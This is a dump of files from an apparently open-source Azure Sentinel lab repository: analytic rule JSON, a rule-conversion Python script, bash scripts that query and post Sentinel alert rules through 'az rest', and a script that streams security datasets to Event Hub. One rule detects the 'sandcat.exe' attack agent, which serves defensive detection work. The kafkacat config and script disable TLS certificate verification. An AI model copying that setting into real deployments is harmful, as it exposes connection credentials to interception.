"triggerThreshold": 1 66 | } 67 | }, 68 | { 69 | "kind": "Scheduled", 70 | "properties": { 71 | "alertRuleTemplateName": null, 72 | "description": "Basic internal rule to detect binary named sandcat.exe", 73 | "displayName": "Sandcat Network", 74 | "enabled": true, 75 | "incidentConfiguration": { 76 | "createIncident": true, 77 | "groupingConfiguration": { 78 | "enabled": false, 79 | "entitiesMatchingMethod": "All", 80 | "groupByEntities": [], 81 | "lookbackDuration": "PT5H", 82 | "reopenClosedIncident": false 83 | } 84 | }, 85 | "query": "SecurityEvent | where EventID == \"4688\" and CommandLine contains \"sandcat.exe\"", 86 | "queryFrequency": "PT5M", 87 | "queryPeriod": "PT5M", 88 | "queryResultsAggregationSettings": { 89 | "aggregationKind": "SingleAlert" 90 | }, 91 | "severity": "High", 92 | "suppressionDuration": "PT5H", 93 | "suppressionEnabled": false, 94 | "tactics": [ 95 | "Execution" 96 | ], 97 | "triggerOperator": "Equal", 98 | "triggerThreshold": 1 99 | } 100 | } 101 | ] 102 | -------------------------------------------------------------------------------- /resources/samples/data/dataset-sample-one.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/samples/data/dataset-sample-one.tar.gz -------------------------------------------------------------------------------- /resources/samples/data/dataset-sample-small.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/samples/data/dataset-sample-small.tar.gz -------------------------------------------------------------------------------- /resources/samples/data/dataset-sample-two.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/samples/data/dataset-sample-two.tar.gz -------------------------------------------------------------------------------- /resources/samples/kafkacat/kafkacat-Example.conf: -------------------------------------------------------------------------------- 1 | metadata.broker.list=.servicebus.windows.net:9093 2 | security.protocol=SASL_SSL 3 | sasl.mechanisms=PLAIN 4 | sasl.username=$ConnectionString 5 | sasl.password= 6 | enable.ssl.certificate.verification=false 7 | message.max.bytes=1000000 8 | -------------------------------------------------------------------------------- /resources/scripts/Convert-AnalyticRules.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: GPL-3.0 5 | 6 | # References: 7 | # https://stackoverflow.com/questions/38620471/json-dumps-u-escaped-unicode-to-utf8 8 | 9 | import glob 10 | import json 11 | import yaml 12 | import argparse 13 | import os 14 | from tqdm import tqdm 15 | from time import sleep 16 | import sys 17 | import logging 18 | 19 | # Initial description 20 | text = "This script translates analytic rules from https://github.com/Azure/Azure-Sentinel/tree/master/Detections to JSON files" 21 | example_text = f'''examples: 22 | 23 | python3 {sys.argv[0]} -f detections/SecurityEvent/ExcessiveLogonFailures.yaml -o folder/ 24 | python3 {sys.argv[0]} -f detections/ -o folder/ 25 | ''' 26 | 27 | # Initiate the parser 28 | parser = argparse.ArgumentParser(description=text,epilog=example_text,formatter_class=argparse.RawDescriptionHelpFormatter) 29 | 30 | # Add arguments (store_true means no argument needed) 31 | parser.add_argument('-f', "--file-path", nargs='+', help="Path of YAML file(s) or folder(s) of YAML files", required=True) 32 | parser.add_argument('-o', "--output-path", type=str , help="Folder path to output JSON files", required=True) 33 | parser.add_argument("-d", "--debug", help="Print lots of debugging statements", action="store_const", dest="loglevel", const=logging.DEBUG, default=logging.WARNING) 34 | parser.add_argument("-v", "--verbose", help="Be verbose", action="store_const", dest="loglevel", const=logging.INFO) 35 | 36 | args = parser.parse_args() 37 | 38 | logging.basicConfig(level=args.loglevel) 39 | log = logging.getLogger(__name__) 40 | 41 | # Set output path 42 | output_path = os.path.abspath(args.output_path) 43 | 44 | # Aggregate files from Input Paths 45 | input_paths = [os.path.abspath(path) for path in args.file_path] 46 | 47 | all_files = [] 48 | for path in input_paths: 49 | if os.path.isfile(path): 50 | all_files.append(path) 51 | elif os.path.isdir(path): 52 | all_files = glob.glob(f"{path}/**/*.yaml", recursive=True) 53 | else: 54 | quit() 55 | 56 | # Initializing outer progress bar and file POST response 57 | outer = tqdm(total=len(all_files), desc='Files', position=0) 58 | 59 | # Initialize All AnalytucRules list 60 | allAnalyticRules = list() 61 | 62 | # Proces all JSON File(s) 63 | for analytic in all_files: 64 | log.info(f'Started to process {analytic}') 65 | 66 | analytic_filename = os.path.splitext(os.path.basename(analytic))[0] 67 | analytic_folder=os.path.dirname(analytic) 68 | analytic_folder_name=os.path.basename(analytic_folder) 69 | 70 | # Create folder if it does not exists 71 | os.makedirs(f'{output_path}/{analytic_folder_name}', exist_ok=True) 72 | 73 | analytic_load = yaml.safe_load(open(analytic).read()) 74 | 75 | # Removing key 'id' 76 | analytic_load.pop("id", None) 77 | 78 | # Updating key 'name' to Key 'displayName' 79 | analytic_load['displayName'] = analytic_load.pop('name') 80 | 81 | # Enabling Rule by adding key 'enabled' 82 | analytic_load['enabled'] = True 83 | 84 | # Transforming string to ISO_8601 format 85 | # References: 86 | # https://en.wikipedia.org/wiki/ISO_8601 87 | # PdDThHmMsS, where d, h, m, and s are digit sequences for the number of days, hours, minutes, and seconds, respectively. For example: "P0DT06H23M34S". 88 | queryFrequency = analytic_load['queryFrequency'].upper() 89 | queryPeriod = analytic_load['queryPeriod'].upper() 90 | if "D" in queryFrequency: 91 | analytic_load['queryFrequency'] = f'P{queryFrequency}' 92 | if "H" in queryFrequency: 93 | analytic_load['queryFrequency'] = f'PT{queryFrequency}' 94 | if "M" in queryFrequency: 95 | analytic_load['queryFrequency'] = f'PT{queryFrequency}' 96 | if "D" in queryPeriod: 97 | analytic_load['queryPeriod'] = f'P{queryPeriod}' 98 | if "H" in queryPeriod: 99 | analytic_load['queryPeriod'] = f'PT{queryPeriod}' 100 | if "M" in queryPeriod: 101 | analytic_load['queryPeriod'] = f'PT{queryPeriod}' 102 | 103 | # Converting TriggerOperator key value 'gt' to type 'Microsoft.Azure.Sentinel.Analytics.Management.AnalyticsManagement.Contracts.Model.AlertTriggerOperator' 104 | if "gt" in analytic_load['triggerOperator']: 105 | analytic_load['triggerOperator'] = "GreaterThan" 106 | 107 | # Adding suppressionDuration to alert 108 | analytic_load['suppressionDuration'] = "PT5H" 109 | analytic_load['suppressionEnabled'] = False 110 | 111 | # Adding Rule template to API Scheduled format 112 | analytic_dict = dict() 113 | analytic_dict['kind'] = 'Scheduled' 114 | analytic_dict['properties'] = analytic_load 115 | 116 | # write to file 117 | with open(f'{output_path}/{analytic_folder_name}/{analytic_filename}.json', 'w') as f: 118 | f.write(json.dumps(analytic_dict, indent=4)) 119 | 120 | # Add to All AnalyticRules list 121 | allAnalyticRules.append(analytic_dict) 122 | outer.update(1) 123 | 124 | # write allAnalyticRule to allAnalyticRules.json 125 | with open(f'{output_path}/allAnalyticRules.json', 'w') as f: 126 | f.write(json.dumps(allAnalyticRules, indent=4)) -------------------------------------------------------------------------------- /resources/scripts/Get-AnalyticRules.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: GPL-3.0 5 | 6 | # Reference: 7 | # https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-rest 8 | # https://github.com/Azure/Azure-Security-Center/tree/master/Powershell%20scripts/Security%20Event%20collection%20tier 9 | # https://medium.com/@mauridb/calling-azure-rest-api-via-curl-eb10a06127 10 | 11 | set -e 12 | 13 | script_name=$0 14 | 15 | usage(){ 16 | echo "Invalid option: -$OPTARG" 17 | echo "Usage: ${script_name} -s " 18 | echo " -r " 19 | echo " -w " 20 | exit 1 21 | } 22 | 23 | while getopts s:r:w:h opt; do 24 | case "$opt" in 25 | s) SUBSCRIPTION_ID=$OPTARG;; 26 | r) RESOURCE_GROUP_NAME=$OPTARG;; 27 | w) WORKSPACE_NAME=$OPTARG;; 28 | h) #Show help 29 | usage 30 | exit 2 31 | ;; 32 | esac 33 | done 34 | 35 | shift $((OPTIND-1)) 36 | [ "$1" = "--" ] && shift 37 | 38 | if [ -z "$RESOURCE_GROUP_NAME" ] || [ -z "$WORKSPACE_NAME" ]; then 39 | usage 40 | else 41 | if [ "$SUBSCRIPTION_ID" ]; then 42 | az rest -m get -u "https://management.azure.com/subscriptions/${SUBSCRIPTION_ID}/resourceGroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/providers/Microsoft.SecurityInsights/alertRules?api-version=2019-01-01-preview" --verbose 43 | else 44 | az rest -m get -u "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/providers/Microsoft.SecurityInsights/alertRules?api-version=2019-01-01-preview" --verbose 45 | fi 46 | fi 47 | -------------------------------------------------------------------------------- /resources/scripts/Get-DataConnectors.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: GPL-3.0 5 | 6 | # Reference: 7 | # https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-rest 8 | # https://github.com/Azure/Azure-Security-Center/tree/master/Powershell%20scripts/Security%20Event%20collection%20tier 9 | # https://medium.com/@mauridb/calling-azure-rest-api-via-curl-eb10a06127 10 | 11 | set -e 12 | 13 | script_name=$0 14 | 15 | usage(){ 16 | echo "Invalid option: -$OPTARG" 17 | echo "Usage: ${script_name} -s " 18 | echo " -r " 19 | echo " -w " 20 | exit 1 21 | } 22 | 23 | while getopts s:r:w:h opt; do 24 | case "$opt" in 25 | s) SUBSCRIPTION_ID=$OPTARG;; 26 | r) RESOURCE_GROUP_NAME=$OPTARG;; 27 | w) WORKSPACE_NAME=$OPTARG;; 28 | h) #Show help 29 | usage 30 | exit 2 31 | ;; 32 | esac 33 | done 34 | 35 | shift $((OPTIND-1)) 36 | [ "$1" = "--" ] && shift 37 | 38 | if [ -z "$RESOURCE_GROUP_NAME" ] || [ -z "$WORKSPACE_NAME" ]; then 39 | usage 40 | else 41 | if [ "$SUBSCRIPTION_ID" ]; then 42 | az rest -m get -u "https://management.azure.com/subscriptions/${SUBSCRIPTION_ID}/resourceGroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/providers/Microsoft.SecurityInsights/dataConnectors/?api-version=2020-01-01" --verbose 43 | else 44 | az rest -m get -u "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/providers/Microsoft.SecurityInsights/dataConnectors/?api-version=2020-01-01" --verbose 45 | fi 46 | fi 47 | -------------------------------------------------------------------------------- /resources/scripts/Get-DataSources.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: GPL-3.0 5 | 6 | # Reference: 7 | # https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-rest 8 | # https://github.com/Azure/Azure-Security-Center/tree/master/Powershell%20scripts/Security%20Event%20collection%20tier 9 | # https://medium.com/@mauridb/calling-azure-rest-api-via-curl-eb10a06127 10 | 11 | set -e 12 | 13 | script_name=$0 14 | 15 | usage(){ 16 | echo "Invalid option: -$OPTARG" 17 | echo "Usage: ${script_name} -s " 18 | echo " -r " 19 | echo " -w " 20 | exit 1 21 | } 22 | 23 | while getopts s:r:w:h opt; do 24 | case "$opt" in 25 | s) SUBSCRIPTION_ID=$OPTARG;; 26 | r) RESOURCE_GROUP_NAME=$OPTARG;; 27 | w) WORKSPACE_NAME=$OPTARG;; 28 | h) #Show help 29 | usage 30 | exit 2 31 | ;; 32 | esac 33 | done 34 | 35 | shift $((OPTIND-1)) 36 | [ "$1" = "--" ] && shift 37 | 38 | if [ -z "$RESOURCE_GROUP_NAME" ] || [ -z "$WORKSPACE_NAME" ]; then 39 | usage 40 | else 41 | if [ "$SUBSCRIPTION_ID" ]; then 42 | az rest -m get -u "https://management.azure.com/subscriptions/${SUBSCRIPTION_ID}/resourcegroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/dataSources?$filter=kind='LinuxSyslogCollection'&api-version=2015-11-01-preview" 43 | #az rest -m get -u "https://management.azure.com/subscriptions/${SUBSCRIPTION_ID}/resourceGroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/datasources?$filter=kind eq 'WindowsEvent'&api-version=2015-11-01-preview" --verbose 44 | else 45 | az rest -m get -u "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/datasources/read?api-version=2015-11-01-preview" --verbose 46 | fi 47 | fi 48 | -------------------------------------------------------------------------------- /resources/scripts/Kafkacat-Mordor-Eventhub.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: GPL-3.0 5 | 6 | usage(){ 7 | echo " " 8 | echo "Usage: $0 [option...]" >&2 9 | echo 10 | echo " -n EventHub Namespace" 11 | echo " -c EventHub Connection String Primary" 12 | echo " -e EventHub name" 13 | echo 14 | echo "Examples:" 15 | echo " $0 -n -c -e &2; exit 1;; 31 | * ) echo "Unimplemented option: -$OPTARG" >&2; exit 1;; 32 | esac 33 | done 34 | 35 | if ((OPTIND == 1)) 36 | then 37 | echo "No options specified" 38 | usage 39 | fi 40 | 41 | # ****** Installing latest kafkacat 42 | if [ -x "$(command -v kafkacat)" ]; then 43 | echo "removing kafkacat.." 44 | apt-get remove --auto-remove -y kafkacat 45 | fi 46 | 47 | echo "Installing Kafkacat.." 48 | wget https://github.com/edenhill/kafkacat/archive/debian/1.4.0-1.tar.gz 49 | tar -xzvf 1.4.0-1.tar.gz 50 | apt install -y librdkafka-dev libyajl-dev build-essential libsasl2-dev libsasl2-modules libssl-dev 51 | cd kafkacat-debian-1.4.0-1/ && ./bootstrap.sh 52 | cp kafkacat /usr/local/bin/ 53 | 54 | echo "Installing Git.." 55 | apt install -y git 56 | 57 | echo "Cloning Security Datasets repo.." 58 | git clone https://github.com/OTRF/Security-Datasets.git 59 | 60 | echo "Decompressing every small security dataset.." 61 | cd Security-Datasets/datasets/small/ 62 | find . -type f -name "*.tar.gz" -print0 | xargs -0 -I{} tar xf {} -C . 63 | 64 | echo "Sending every dataset to Azure Event Hub" 65 | filescount=$(find . -maxdepth 1 -type f -name "*.json" -printf x | wc -c) 66 | count=0 67 | for dataset in *.json; do 68 | count=$(($count + 1)) 69 | echo "($count of $filescount) Sending $dataset .." 70 | kafkacat -b ${EVENTHUB_NAMESPACE}.servicebus.windows.net:9093 -t ${EVENTHUB_NAME} -X metadata.broker.list=${EVENTHUB_NAMESPACE}.servicebus.windows.net:9093 -X security.protocol=sasl_ssl -X sasl.mechanisms=PLAIN -X sasl.username=\$ConnectionString -X sasl.password="${EVENTHUB_CONNECTIONSTRING}" -X enable.ssl.certificate.verification=false -X message.max.bytes=1000000 -P -v -l $dataset 71 | sleep 5 72 | done 73 | -------------------------------------------------------------------------------- /resources/scripts/New-ManagedIdentity.ps1: -------------------------------------------------------------------------------- 1 | function New-ManagedIdentity { 2 | <# 3 | .SYNOPSIS 4 | A PowerShell wrapper around the Azure CLI "az identity" command to create a user assigned managed identity. 5 | 6 | Author: Roberto Rodriguez (@Cyb3rWard0g) 7 | License: MIT 8 | Required Dependencies: Azure CLI 9 | Optional Dependencies: None 10 | 11 | .DESCRIPTION 12 | New-ManagedIdentity is a simple PowerShell wrapper around the Azure CLI "az identity" command to create a user assigned managed identity. 13 | 14 | .PARAMETER Name 15 | The name of the new user assigned managed identity. 16 | 17 | .PARAMETER ResourceGroup 18 | The name of the resource group to verify if managed identity exists in. 19 | 20 | .LINK 21 | https://docs.microsoft.com/en-us/azure/active-directory/managed-identities-azure-resources/how-manage-user-assigned-managed-identities?pivots=identity-mi-methods-azp 22 | https://docs.microsoft.com/en-us/azure/app-service/overview-managed-identity?tabs=dotnet 23 | #> 24 | 25 | [cmdletbinding()] 26 | Param( 27 | [parameter(Mandatory = $True)] 28 | [String] $Name, 29 | 30 | [parameter(Mandatory = $True)] 31 | [String] $ResourceGroup 32 | ) 33 | 34 | # Validate signed in user 35 | $signedInUser = az ad signed-in-user show --query '[displayName, mail]' | convertfrom-json 36 | if (!($signedInUser)){ 37 | az login 38 | } 39 | else { 40 | Write-Host "[+] Using the following user context:" 41 | Write-Host "[+] UserName: $($SignedInUser[0])" 42 | Write-Host "[+] E-mail: $($SignedInUser[1])" 43 | } 44 | 45 | # Verify if identity already exists 46 | $Name= $Name.Trim() -replace "['`"]", "" 47 | $results = $(az identity list --query "[?name=='$Name']" --resource-group $ResourceGroup| ConvertFrom-Json)[0] 48 | if ($results){ 49 | Write-Host "[!] User assigned identity $Name already exists!" 50 | } 51 | else { 52 | Write-Host "[+] Creating User Assigned Managed Identity: $Name" 53 | $results = az identity create -g $ResourceGroup -n $Name | ConvertFrom-Json 54 | if ($results) { 55 | Write-Host "[+] User assigned managed identity was created successfully!" 56 | <# 57 | clientId : CLIENTID 58 | clientSecretUrl : https://control-eastus.identity.azure.net/subscriptions/SUBSCRIPTIONID/resourcegroups/apps/providers/ 59 | Microsoft.ManagedIdentity/userAssignedIdentities/IDENTITYNAME/credentials?tid=TENANTID&oid=PRINCIPALID&aid=CLIENTID 60 | id : /subscriptions/SUBSCRIPTIONID/resourcegroups/apps/providers/Microsoft.ManagedIdentity/userAssignedIde 61 | ntities/IDENTITYNAME 62 | location : eastus 63 | name : IDENTITYNAME 64 | principalId : PRINCIPALID 65 | resourceGroup : apps 66 | tags : 67 | tenantId : TENANTID 68 | type : Microsoft.ManagedIdentity/userAssignedIdentities 69 | #> 70 | $results 71 | } 72 | else { 73 | Write-Host "[!] User assigned identity was not created." 74 | } 75 | } 76 | } -------------------------------------------------------------------------------- /resources/scripts/Post-AnalyticRules.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: GPL-3.0 5 | 6 | # Reference: 7 | # https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-rest 8 | # https://github.com/Azure/Azure-Security-Center/tree/master/Powershell%20scripts/Security%20Event%20collection%20tier 9 | # https://medium.com/@mauridb/calling-azure-rest-api-via-curl-eb10a06127 10 | # https://oncletom.io/2016/pipelining-http/ 11 | # https://starkandwayne.com/blog/bash-for-loop-over-json-array-using-jq/ 12 | # https://cameronnokes.com/blog/working-with-json-in-bash-using-jq/ 13 | 14 | set -e 15 | 16 | script_name=$0 17 | 18 | usage(){ 19 | echo "Invalid option: -$OPTARG" 20 | echo "Usage: ${script_name} -r " 21 | echo " -w " 22 | exit 1 23 | } 24 | 25 | while getopts r:w:h opt; do 26 | case "$opt" in 27 | r) RESOURCE_GROUP_NAME=$OPTARG;; 28 | w) WORKSPACE_NAME=$OPTARG;; 29 | h) #Show help 30 | usage 31 | exit 2 32 | ;; 33 | esac 34 | done 35 | 36 | shift $((OPTIND-1)) 37 | [ "$1" = "--" ] && shift 38 | 39 | if [ -z "$RESOURCE_GROUP_NAME" ] || [ -z "$WORKSPACE_NAME" ]; then 40 | usage 41 | else 42 | SYSTEM_KERNEL="$(uname -s)" 43 | for row in $(curl -sS https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/master/microsoft-sentinel/analytic-rules/allAnalyticRules.json | jq -r '.[] | @base64'); do 44 | return_code=$? 45 | # Generating GUID for analytic rule Id 46 | if [ "$SYSTEM_KERNEL" == "Linux" ]; then 47 | name=$(cat /proc/sys/kernel/random/uuid) 48 | elif [ "$SYSTEM_KERNEL" == "Darwin" ]; then 49 | name=$(uuidgen) 50 | fi 51 | # Getting analytic rule name 52 | ruleName=$(echo ${row} | base64 -d | jq -r ${1}.properties.displayName) 53 | # Posting analytic rule to Azure Sentinel's workspace 54 | echo -e "\n[+] Analytic Rule: $ruleName" 55 | echo ${row} | base64 -d | jq -r ${1} | az rest -m put -u "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/providers/Microsoft.SecurityInsights/alertRules/${name}?api-version=2019-01-01-preview" --body @- --verbose || return_code=$? 56 | # Handling error 57 | if [ "$return_code" != "0" ] && [ "$return_code" ]; then 58 | RED='\033[0;31m' 59 | NC='\033[0m' 60 | echo -e "${RED}[!] Creation of analytic rule failed.." 61 | echo ${row} | base64 -d | jq -Mr ${1} 62 | echo -e "${NC}" 63 | fi 64 | sleep 1 65 | done 66 | fi 67 | -------------------------------------------------------------------------------- /resources/scripts/Post-AnalyticRules_Backup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: GPL-3.0 5 | 6 | # Reference: 7 | # https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-rest 8 | # https://github.com/Azure/Azure-Security-Center/tree/master/Powershell%20scripts/Security%20Event%20collection%20tier 9 | # https://medium.com/@mauridb/calling-azure-rest-api-via-curl-eb10a06127 10 | # https://oncletom.io/2016/pipelining-http/ 11 | # https://starkandwayne.com/blog/bash-for-loop-over-json-array-using-jq/ 12 | # https://cameronnokes.com/blog/working-with-json-in-bash-using-jq/ 13 | 14 | set -e 15 | 16 | script_name=$0 17 | 18 | usage(){ 19 | echo "Invalid option: -$OPTARG" 20 | echo "Usage: ${script_name} -r " 21 | echo " -w " 22 | exit 1 23 | } 24 | 25 | while getopts r:w:h opt; do 26 | case "$opt" in 27 | r) RESOURCE_GROUP_NAME=$OPTARG;; 28 | w) WORKSPACE_NAME=$OPTARG;; 29 | h) #Show help 30 | usage 31 | exit 2 32 | ;; 33 | esac 34 | done 35 | 36 | shift $((OPTIND-1)) 37 | [ "$1" = "--" ] && shift 38 | 39 | if [ -z "$RESOURCE_GROUP_NAME" ] || [ -z "$WORKSPACE_NAME" ]; then 40 | usage 41 | else 42 | SYSTEM_KERNEL="$(uname -s)" 43 | #for row in $(curl -sS https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/master/microsoft-sentinel/analytic-rules/allAnalyticRules.json | jq -r '.[] | @base64'); do 44 | for row in $(cat ../samples/analytic-rules/sandcats.json | jq -r '.[] | @base64'); do 45 | return_code=$? 46 | # Generating GUID for analytic rule Id 47 | if [ "$SYSTEM_KERNEL" == "Linux" ]; then 48 | name=$(cat /proc/sys/kernel/random/uuid) 49 | elif [ "$SYSTEM_KERNEL" == "Darwin" ]; then 50 | name=$(uuidgen) 51 | fi 52 | # Getting analytic rule name 53 | ruleName=$(echo ${row} | base64 -d | jq -r ${1}.properties.displayName) 54 | # Posting analytic rule to Azure Sentinel's workspace 55 | echo -e "\n[+] Analytic Rule: $ruleName" 56 | echo ${row} | base64 -d | jq -r ${1} | az rest -m put -u "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/providers/Microsoft.SecurityInsights/alertRules/${name}?api-version=2019-01-01-preview" --body @- --verbose || return_code=$? 57 | # Handling error 58 | if [ "$return_code" != "0" ] && [ "$return_code" ]; then 59 | RED='\033[0;31m' 60 | NC='\033[0m' 61 | echo -e "${RED}[!] Creation of analytic rule failed.." 62 | echo ${row} | base64 -d | jq -Mr ${1} 63 | echo -e "${NC}" 64 | fi 65 | sleep 1 66 | done 67 | fi 68 | -------------------------------------------------------------------------------- /resources/scripts/Set-WinEventCollectionTier.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: GPL-3.0 5 | 6 | # Reference: 7 | # https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-rest 8 | # https://github.com/Azure/Azure-Security-Center/tree/master/Powershell%20scripts/Security%20Event%20collection%20tier 9 | # https://medium.com/@mauridb/calling-azure-rest-api-via-curl-eb10a06127 10 | 11 | set -e 12 | 13 | script_name=$0 14 | 15 | usage(){ 16 | echo "Invalid option: -$OPTARG" 17 | echo "Usage: ${script_name} -r [Resource group name]" 18 | echo " -w [Log Analytics Workspace Name]" 19 | echo " -t [Security Events collection tier (None, Minimal, All)]" 20 | exit 1 21 | } 22 | 23 | while getopts r:w:t:h opt; do 24 | case "$opt" in 25 | r) RESOURCE_GROUP_NAME=$OPTARG;; 26 | w) WORKSPACE_NAME=$OPTARG;; 27 | t) COLLECTION_TIER=$OPTARG;; 28 | h) #Show help 29 | usage 30 | exit 2 31 | ;; 32 | esac 33 | done 34 | 35 | shift $((OPTIND-1)) 36 | [ "$1" = "--" ] && shift 37 | 38 | if [ -z "$RESOURCE_GROUP_NAME" ] || [ -z "$WORKSPACE_NAME" ] || [ -z "$COLLECTION_TIER" ]; then 39 | usage 40 | else 41 | # *********** Validating Collection Tier *************** 42 | case $COLLECTION_TIER in 43 | None) ;; 44 | Minimal) ;; 45 | All) ;; 46 | *) 47 | echo -e "\n[!!] Not a valid Windows security event collection tier. Allowed tiers: None, Minimal & All\n" 48 | usage 49 | ;; 50 | esac 51 | 52 | az rest -m put -u "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/datasources/SecurityInsightsSecurityEventCollectionConfiguration?api-version=2015-11-01-preview" --body " 53 | { 54 | \"kind\": \"SecurityInsightsSecurityEventCollectionConfiguration\", 55 | \"properties\": { 56 | \"Tier\": \"${COLLECTION_TIER}\", 57 | \"TierSetMethod\": \"Custom\" 58 | } 59 | } 60 | " --verbose 61 | fi 62 | # SecurityInsightsSecurityEventCollectionConfiguration 63 | # az rest -m put -u "https://management.azure.com/subscriptions/{subscriptionId}/resourcegroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/Workspaces/${WORKSPACE_NAME}/datasources/SecurityEventCollectionConfiguration?api-version=2015-11-01-preview" --body " 64 | # SecurityEventCollectionConfiguration 65 | --------------------------------------------------------------------------------